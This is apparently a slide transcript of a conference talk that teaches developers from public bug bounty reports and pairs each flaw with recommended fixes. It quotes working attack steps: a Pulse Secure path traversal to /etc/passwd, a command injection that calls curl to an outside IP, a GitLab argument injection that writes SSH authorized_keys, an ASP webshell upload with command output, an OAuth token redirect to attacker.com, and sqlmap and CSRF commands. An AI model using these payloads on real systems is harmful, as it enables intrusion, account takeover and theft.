Recommended
Recommended
More Related Content
What's hot
What's hot (20)
Similar to Watch How The Giants Fall: Learning from Bug Bounty Results
Similar to Watch How The Giants Fall: Learning from Bug Bounty Results (20)
More from jtmelton
More from jtmelton (7)
Recently uploaded
Recently uploaded (20)
Watch How The Giants Fall: Learning from Bug Bounty Results
- 1. Watch How The Giants Fall John Melton CodeMash 2020
- 2. Me • Director, Product Security & OWASP guy • twitter: _jtmelton • github: jtmelton • email: jtmelton@gmail.com
- 3. Agenda • intro • for each bug • understand issue • understand fix • pointers to helpful tools • wrap-up
- 4. Intro • Security bugs are just bugs • There are many types (714 weaknesses in CWE across 237 categories) • They go by many names (frustratingly inconsistent) • There is a wide range of complexity • There is no such thing as a “top 10” for you (see ecological fallacy)
- 5. A few bugs … • Account Takeover • Direct Object Reference • XXE • XSS • RCE • OS Command Injection • Subdomain Takeover • CSRF • Sql Injection • Insecure 3rd party libraries • Missing Access Control • SSRF • Parameter Pollution • Privilege Escalation • Insecure Configuration • Deserialization • Authentication Bypass • Hardcoded Password
- 6. 0 / 22
- 8. Insecure 3rd Party Libraries “One of the DoD applications uses a java library which is vulnerable to expression language injection. Using only an URL I was able to inject java code. I made a simple PoC that requests a name resolution to a DNS server. The application at https://███ uses Primefaces version 5.3 which is vulnerable to Expression Language injection through DynamicContent generator.”
- 9. Insecure 3rd Party Libraries “With the code attached generate the payload encrypted with the default key "primefaces". With the payload from #1, send a GET request using curl (curl -vk https://████/ javax.faces.resource/ dynamiccontent.properties.xhtml? pfdrt=sc&ln=primefaces&pfdrid=<YOUR_PAYL OAD_HERE>”
- 10. Insecure 3rd Party Libraries “You will receive a name resolution request for remoteMalJarUrl from the DoD application. We could use this DNS request to exfiltrate data from the server. And as I said, theoretically I could also delete files from the server using the File class.”
- 11. Insecure 3rd Party Libraries Recommendations: 1. Update your libraries regularly! Even use auto-updaters where possible (requires test confidence) 2. Scan for known vulnerabilities. (OWASP Dependency Check, Dependency Track) 3. Build a BOM (Dependency Track)
- 12. 1 / 22
- 14. Privilege Escalation “Because lack of security, attacker will be able to remove original log file and replace it will a symlink to other file. After finishing job, host machine copy file from docker container. Because the original log file has been removed, the host machine will copy the symlink file. But the problem is it doesn't copy the linked file in container, it copies the linked file in the HOST MACHINE.”
- 17. Privilege Escalation Recommendations: • “We're currently in the process of deploying a remediation involving removing symlinks from data uploaded from the worker.” • Sandbox sensitive processes • Monitor logs • Understand technology choices (docker reading from host)
- 18. ???
- 19. $2,000
- 20. 2 / 22
- 22. CSRF “The POST request to /ocs/v2.php/apps/ provisioning_api/api/v1/config/apps/core/ encryption_enabled is missing a unique token, so that if an attack can trick an admin user with an active session to visit an attacker controlled website, he/she can control the core application setting "encryption_enabled"”
- 23. CSRF curl -i -s -k -X $'POST' -H $'Host: <nextcloud_server>' -H $'Proxy- Connection: keep-alive' -H $'Content-Length: 10' -H $'Accept: /' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' - H $'OCS-APIREQUEST: true' -H $'Origin: http://<nextcloud_server>' - H $'User-Agent: Mozilla/5.0 (Windows NT 6.1;WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36' -H $'X-Requested-With: XMLHttpRequest' -H $'requesttoken: sSxMouPIwzbpI5ErZycXzGqCsOzacYntRk18kUOwin4=:gBUhzYWys3 qhEqNPFE1frx663pq9BdjaKiwz5zfo6y4=' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9 ' -H $'Cookie: <cookies>' --data-binary $'value=nox0dx0a' $'http:// <nextcloud_server>/ocs/v2.php/apps/provisioning_api/api/v1/ config/apps/core/encryption_enabled'
- 24. CSRF “We are going to prevent this, but since you can not abuse it really without being an admin, and at that point you can also revert our patch, it's not eligible for a bounty.”
- 25. CSRF Recommendations: • Use modern frameworks, enabling CSRF config if necessary • OWASP CSRF Cheat Sheet • OWASP CSRFGuard
- 26. ???
- 28. 3 / 22
- 30. SSRF “By sending a malformed HTTP request to alerts.newrelic.com, it's possible to trick that server into routing the request to an arbitrary location. This can be exploited by an internet based attacker to access internal services - doing a quick scan of █████████ I was able to access █████ etc.”
- 31. SSRF
- 32. SSRF
- 33. SSRF “This code may look faultless - it takes the user-supplied URL, replaces the domain with the hard-coded backend server's address, and passes it along. Unfortunately the Apache HttpComponents server library failed to require that paths start with '/'. This meant that when I sent the following request: ” The code above rewrote this request as http://public- backend@burp-collaborator.net/ and routed the request to burp-collaborator.net.
- 34. SSRF
- 35. SSRF
- 36. SSRF Recommendations: • OWASP Injection Prevention Cheat Sheet • Strict input validation • Map commands if possible (3 -> ping) • Encode output parameters
- 37. ???
- 39. 4 / 22
- 41. File Disclosure “CVE-2019-11510 is a file disclosure due to some normalization issues in pulse secure. I was able to reproduce this by grabbing /etc/ passwd. https://$hax/dana-na/../dana/html5acc/ guacamole/../../../../../../etc/passwd?/dana/ html5acc/guacamole/#”
- 42. File Disclosure “The file /data/runtime/mtmp/lmdb/dataa/data.mdb contains clear context passwords and usernames, when a user logs in from here we can then access the Pulse secure instance.”
- 43. File Disclosure Recommendations: • When doing file operations, always start with a secure prefix • Use whitelisted options where possible • Normalize (canonicalize) input otherwise, being careful to do full input validation (length, type, encoding, semantic value, etc.)
- 44. ???
- 45. $0
- 46. 5 / 22
- 48. Insufficient Authorization “For public projects, GitLab allows to restrict CI pipelines to project members only (public pipelines disabled). However, in this case, the merge request widget still renders the scanning reports result, which is the outcome of a CI pipeline. Unauthorized users have access to critical information like the container scanning or dependency scanning report, thus have a lot of insight of an application. By knowing the found vulnerabilities (or still existing), they could attack the target application.”
- 49. Insufficient Authorization “Create a public project, restrict CI pipeline access to project members, and disable public pipelines Push a new branch and add .gitlab-ci.yml file, and create a merge request with those changes As an unauthorized user, visit the page https:// example.gitlab.com/<namespace>/<public-project- name>/merge_requests/1/merge_requests/1/ c o n t a i n e r _ s c a n n i n g _ re p o r t s a n d h t t p s : / / example.gitlab.com/<namespace>/<public-project- name>/merge_requests/1/merge_requests/1/ dependency_scanning_reports“
- 50. Insufficient Authorization Recommendations: • Ensure your access control decision is appropriate for the content • OWASP Access Control Cheat Sheet • Appropriate logging and monitoring
- 51. ???
- 52. $3,000
- 53. 6 / 22
- 55. Subdomain Takeover 1. Buy a domain at a hosting site (123xyz.hosting.com) 2. Get a vanity domain (2017event.mysite.com) 3. Create cname record for vanity -> hosting 4. Hosting site expires (not needed anymore), but cname is still there 5. Attacker registers hosting domain 6. Vanity domain now points to attacker site
- 56. Subdomain Takeover “The dangling CNAME record of datacafe- cert.starbucks.com is pointing to s00397nasv101-datacafe- cert.azurewebsites.net which was not claimed by you. I registered a service with this name and therefore was able to takeover the subdomain. Every attacker doing this has afterwords full control over the contents served on this subdomain.”
- 57. Subdomain Takeover 1. Using dig, I was able to determine that the subdomain 'd02-1-ag.productioncontroller.starbucks.com' was vulnerable to takeover. The record showed status: NXDOMAIN and was pointing to the CNAME: 3edbac0a-5c43-428a-b451-a5eb268f888b.cloudapp.net. 2. Using this information, I was able to create a new Azure Cloud Service with the name '3edbac0a-5c43-428a-b451- a5eb268f888b'. This would resolve to the CNAME record mentioned above. 3. I then crafted a website and uploaded it to the cloud service using this as a guide: https://docs.microsoft.com/ en-us/azure/cloud-services/cloud-services-how-to-create- deploy-portal. 4. I was then able to view the uploaded site at http://d02-1- ag.productioncontroller.starbucks.com
- 58. Subdomain Takeover Recommendations: • Actively manage network infrastructure • Run specialty subdomain scanning tools against yourself
- 59. ???
- 60. $2,000 $2,000
- 61. 7 / 22
- 63. Web Cache Poisoning “On https://paypal.com/, you could impact core functionality by using an invalid Transfer-Encoding header to replace JavaScript files from www.paypalobjects.com with the message '501 Not Implemented'. This was patched and awarded a $9,700 bounty.”
- 65. Web Cache Poisoning When XSSing yourself is not just XSSing yourself!
- 66. Web Cache Poisoning Recommendations: • Take significant care with web caches • Be careful about cache keys and what they’re used for
- 67. ???
- 68. $9,700
- 69. 8 / 22
- 71. Insecure Configuration “The slack binary from the Linux desktop application is no position independent executable: $ file usr/lib/slack/slack usr/lib/slack/slack: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, stripped (pie executables report either "LSB shared object" or "LSB pie executable”.)"
- 72. Insecure Configuration “Position independent executables are required for full ASLR support on Linux. Non- pie-binaries are loaded to a fixed location, thus allowing ROP attacks. I'm aware that technically this is not a vulnerability, but a lack of a hardening feature. However given that ASLR is generally considered standard practice these days and that lack of it can mean very simple bugs can directly lead to code execution I think it deserves to be fixed.”
- 73. Insecure Configuration “A simple memory corruption bug like a buffer overflow can easily lead to a remote code execution bug. With ASLR these bugs are much harder and sometimes impossible to exploit.”
- 74. Insecure Configuration Recommendations: • Make sure to enable secure default configurations • Use linters and scanners looking for bad configs (language / framework specific usually)
- 75. ???
- 76. $100
- 77. 9 / 22
- 79. Insecure Configuration “Nginx misconfiguration leading to direct PHP source code download data.gov uses nginx as the web server. Due to the server misconfiguration, instead of processing the file, the .php source code is send to the client requesting from the direct url.”
- 80. Insecure Configuration “attacker can download any .php file on the web leading to huge information about the server. data.gov implement saml (open- source), the config.php file in the saml config folder can be downloaded by the direct url request, it contains sensitive information such as: auth.adminpassword, tecnical contact email, and (possibly) database password.”
- 81. Insecure Configuration Recommendations: • Make sure to enable secure default configurations • Use linters and scanners looking for bad configs (language / framework specific usually) • If there’s a website, use active DAST scanners (ZAP, Burp, Arachni, etc.)
- 82. ???
- 83. $750
- 84. 10 / 22
- 86. HPP “I would like to report an issue on Digits web authentication which allows attackers to retrieve the OAuth credential data of an application victims authorized.” “…the login page has 2 parameters, consumer_key and host. The former identifies which app a user wants to authenticate, and the latter specifies which domain the OAuth credential data is sent to after authentication. In order to prevent other websites to pretend to be the application, the host parameter will be validated to see if it matches the registered domain of the app. ”
- 87. HPP https://www.digits.com/login? consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3 A%2F%2Fwww.periscope.tv host=https://www.periscope.tv matches the registered domain If we modify it: https://www.digits.com/login? consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3 A%2F%2Fattacker.com host=https://attacker.com does not match the registered domain, thus the page will show an error.
- 88. HPP However, the validation can be bypassed with HPP (HTTP Parameter Pollution). If we supply multiple host parameters, the validation will only compare the first one but the last one is used in the transfer step instead. https://www.digits.com/login? consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3 A%2F%2Fwww.periscope.tv&host=https%3A%2F%2Fattacker.c om The first host (host=https://www.periscope.tv) is validated but not the second one. After authentication the second host (host=https://attacker.com) is used as the transfer origin.
- 89. HPP
- 90. HPP Recommendations: • Understand the way your language / framework / server handles multiple parameters of the same name • Understand server and client side HPP • Input validation for HPP (reject/report)
- 91. ???
- 92. $2,520
- 93. 11 / 22
- 95. Command Injection “OS Command Injection in Nexus Repository Manager 2.x (bypass CVE-2019-5475)” “The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All instances using CommandLineExecutor.java with user-supplied data is vulnerable, such as the Yum Configuration Capability. ”
- 96. Command Injection Take a look at the patch for CVE-2019-5475 https://github.com/sonatype/nexus-public/ commit/ 7b9939e71693422d3e09adc3744fa2e9b3a62a63 #diff-4ab0523de106ac7a38808f0231fc8a23R84 The getCleanCommand method is not completely filtered and can still be bypassed.
- 97. Command Injection Steps To Reproduce: 1.Navigate to "Capabilities" in Nexus Repository Manager. 2.Edit or create a new Yum: Configuration capability 3.Set path of "createrepo" or "mergerepo" to an OS command (e.g. /bin/bash -c curl${IFS} http://192.168.88.1:8000/ || /createrepo)
- 98. Command Injection Recommendations: • Validate input agressively • OWASP Input Validation Cheat Sheet
- 99. ???
- 100. $0
- 101. 12 / 22
- 103. Hardcoded Key “While going through Github search I discovered a public repository which contains Jumbcloud API Key of Starbucks.”
- 104. Hardcoded Key POC: List systems curl -H "x-api-key: ████████" "https:// console.jumpcloud.com/api/systems" There are multiple AWS instances present curl -H "x-api-key: █████" "https:// console.jumpcloud.com/api/systemusers" SSO Applications curl -H "x-api-key: ██████" "https://console.jumpcloud.com/api/applications" AWS login SAM config is presents. This would leads to AWS account takeover
- 105. Hardcoded Key This issue impact is critical as through this API anyone could: Execute commands on systems https:// docs.jumpcloud.com/1.0/commands/create-a- command Add/Remove users which has access to internal systems AWS Account Takeover
- 106. Hardcoded Key Recommendations: • Don’t hardcode keys • Use HSM, Hashicorp Vault, etc. • Run scanning tools looking for hardcoded passwords and keys (git-secrets, gitleaks, gitrob, trufflehog)
- 107. ???
- 108. $4,000
- 109. 13 / 22
- 111. RCE 1.Create a wiki new wiki page called page with the commit message controlled content 2.Search for the wiki blob via the Search API, with the injected ref flag: curl --header "PRIVATE-TOKEN: $TOKEN" 'http:// gitlab-vm.local/api/v4/projects/5/search? scope=wiki_blobs&search=page&ref=--output=/tmp/file' 3.See that the file has been created: git@gitlab-vm:~$ cat /tmp/file commit f00f9538d29b176e9dfb2eb1bfe1eab190cad3d9 Author:Administrator <admin@example.com> Date: Wed Jul 24 13:08:51 2019 +0000 controlled content
- 112. RCE 1.Create a new rsa key 2.Create a new wiki page setting the commit message to the rsa public key 3.Run the Search API with ref=--output=/var/opt/gitlab/.ssh/authorized_keys 4.ssh into gitlab using the created key: $ ssh git@gitlab-vm.local -i gitlab Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-70-generic x86_64) $ id uid=998(git) gid=998(git) groups=998(git) $ cat /var/opt/gitlab/.ssh/authorized_keys commit 00c8e52996654d02bcbdba47dc25ee73671cbfd6 Author:Administrator <admin@example.com> Date: Wed Jul 24 12:56:23 2019 +0000 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxsqkWZobL5DBOnM3rtE7ZDP4d9v0lABJRGJbovHHTNY2iH 3x3pjjerPfLDO21Gkyfzn4J+x6O6GleMAB5nxnZRH7E44khfW6Ldql29Rv2Q/ IYCsBSKxGT6RCOFusoRi1uHlQmexIh4gZkmPeFfDLTy70Xv3FpPLfKE/ EiVOjuEtY9JUC4MVlPHaTzZ2HE4sZT5tvcm9YtSpjT2v0SMR8uCXcKMAx4Tsu/ Un2N5UziXgtRF+vD0fRhNyKIkOtULwBgWkL5RE71vYbxOhviqTAld7r70TIWSzSUHcUewbMS5XcEdBwl3XI /9qzo+jOA0Ulf2bkkROpELBoHwfLdpu9p will@MacBook-Pro.local
- 113. RCE Recommendations: • Input Validation • Lock down anything with files closely
- 114. ???
- 115. $12,000
- 116. 14 / 22
- 118. RCE Webshell via File Upload on ecjobs.starbucks.com.cn 1.Sign in the url(https://ecjobs.starbucks.com.cn) and direct to the resume endpoint. 2.Use burp suite tools to interrupt the avatar upload request. 3.Replace the filename type .jpg to asp which have a space character behind and modify the content After that you have uploaded malicious files on the server and run any os command on server you wanted.
- 119. RCE curl ‘https://ecjobs.starbucks.com.cn/recruitjob/tempfiles/ temp_uploaded_739175df-5949-4bba-9945-1c1720e8e109.asp?getsc=dir%20d:TrustHX STBKSERM101www_app%20%2fd%2fs%2fb' HTTP/1.1 200 OK Date: Fri, 08 Mar 2019 02:56:19 GMT Server: wswaf/2.13.0-5.el6 … Content-Length: 1814533 <html> <body> <h1>POC by hackerone_john stone</h1> <textarea readonly cols=80 rows=25> d:TrustHXSTBKSERM101www_appbin d:TrustHXSTBKSERM101www_appcommon d:TrustHXSTBKSERM101www_appconcurrent_test d:TrustHXSTBKSERM101www_appDefault.aspx d:TrustHXSTBKSERM101www_appGlobal.asax d:TrustHXSTBKSERM101www_apphximages_v6 .................................... </textarea> </body> </html>
- 120. RCE curl $'https://ecjobs.starbucks.com.cn/recruitjob/tempfiles/ temp_uploaded_739175df-5949-4bba-9945-1c1720e8e109.asp?getsc=type%20d:TrustHXSTBKSERM101www_app concurrent_testnew_application_concurrent_test__svc.cs' HTTP/1.1 200 OK Date: Fri, 08 Mar 2019 03:37:39 GMT … Connection: close Content-Length: 33316 <html> <body> <h1>POC by hackerone_john stone</h1> <textarea readonly cols=80 rows=25> using System; using System.Collections.Generic; using System.ComponentModel; … using hxmd = TrustHX.HXMD6; class new_application_concurrent_test : IHXPageXmlService { #region IHXPageXmlService æå … case "CONCURRENT_TEST":return ConcurrentTest.ConcurrentTestProcess(strSystemCode, strPageXmlServiceContent); default: string strErrorMessageText = .................................... </textarea> </body> </html>
- 121. RCE Recommendations: • Input Validation • Lock down anything with files closely
- 122. ???
- 123. $4,000
- 124. 15 / 22
- 126. Insecure Design “When requesting a ride, it was possible to intercept the request and forward it with 3 random characters at the end of the paymentProfileUuid parameter. This would cause the ride to disappear from both the Rider and Driver's trip history, the Rider would not be charged, and the Driver would not receive payment for the trip.”
- 127. Insecure Design Recommendations: • Input Validation • Appropriate Monitoring • Fraud Detection
- 128. ???
- 129. $1,500
- 130. 16 / 22
- 132. Sqli Steps to Reproduce: 1.python sqlmap.py -u https://REPLACE-ME/public/ saveCount.cfm?countID=4 --level=3 --risk=3 Impact Attacker can take control over the database server.
- 133. Sqli Recommendations: 1. Use modern frameworks and libraries 2. Build safe APIs 3. Scan with SAST 4. Scan with DAST (sqlmap)
- 134. ???
- 135. $0
- 136. 17 / 22
- 138. Hardcoded Token “GitHub is a truly awesome service but it is unwise to put any sensitive data in code that is hosted on GitHub and similar services as i was able to find github token indexed 7 hours Ago by user ██████ - Software Engineer - Snap Inc”
- 139. Hardcoded Token “I know it’s not my right to ask, just out of curiosity, what was the impact of the above if it reached bad hands? Doesn’t the google authentication somehow protect the access to this site even with the token leaked ? The web interface needed a valid snap account, but not the API.”
- 140. Hardcoded Token Recommendations: • Don’t hardcode tokens • Use HSM, Hashicorp Vault, etc. • Run scanning tools looking for hardcoded tokens (git-secrets, gitleaks, gitrob, trufflehog)
- 141. ???
- 142. $15,000
- 143. 18 / 22
- 145. Insecure Design When a user creates an account using Google or Facebook and does not set an additional password, it is possible to set their passwords via CSRF. Since the account is created using a social media account, no existing password check is needed and the CSRF check on the endpoint is broken. An attacker can take over of accounts created using Google or Facebook.
- 146. Insecure Design Recommendations: • Input Validation • Consider cross-feature impacts
- 147. ???
- 149. 19 / 22
- 151. Insecure Design Chained Bugs to LeakVictim's Uber's FB Oauth Token 1.Prompt OAuth authorization on facebook.com 2.Redirect to https://auth.uber.com/login?next_url=https:// login.uber.com/logout from Facebook 3.Redirect to https://login.uber.com/ logout from auth.uber.com 4.Redirect to attacker site from Referer header and return the token When combined, this would have allowed for a full account takeover
- 152. Insecure Design Recommendations: • Input Validation • Consider cross-feature impacts
- 153. ???
- 154. $7,500
- 155. 20 / 22
- 157. Account Takeover “Through the endpoint at /rt/users/ passwordless-signup it is possible to change the password of any Uber user, given knowledge of their phone number (or by just enumerating phone numbers until one is found that is registered with Uber - not too hard given the number of Uber users).”
- 158. Account Takeover
- 159. Account Takeover Recommendations: • Authenticate / re-authenticate important activities • Consider behavioral analysis
- 160. ???
- 161. $10,000
- 162. 21 / 22
- 164. Insecure Design “There is a vulnerability in Vimeo which allows any user to watch password video without the password. A user can like a passworded video without password, then the user can watch the video on Couchmode without the password.”
- 165. Insecure Design
- 166. Insecure Design Recommendations: • Carefully consider interactions across features • Don’t actually depend on security by obscurity • Emit as little metadata as possible
- 167. ???
- 168. $500
- 169. 22 / 22
- 171. Insecure Design “I found a way to become a verified GitLab team member on Slack. By doing so, I gained access to dozens of channels possibly containing sensitive information. ”
- 172. Insecure Design
- 173. Insecure Design
- 174. Insecure Design
- 175. Insecure Design
- 176. Insecure Design
- 177. Insecure Design Recommendations: • Threat Model your applications • Consider a bug bounty • Hire smart people
- 178. ???
- 179. $0
- 180. So … what now?
- 181. There is hope … • Follow security design principles • Keep knowledge current • Spend effort throughout SDLC • Focus on key controls (2fa, input validation) • Work on prevention, but also detection and response • Patch • (try bug bounties - make some extra $)
- 182. Questions • twitter: _jtmelton • github: jtmelton • email: jtmelton@gmail.com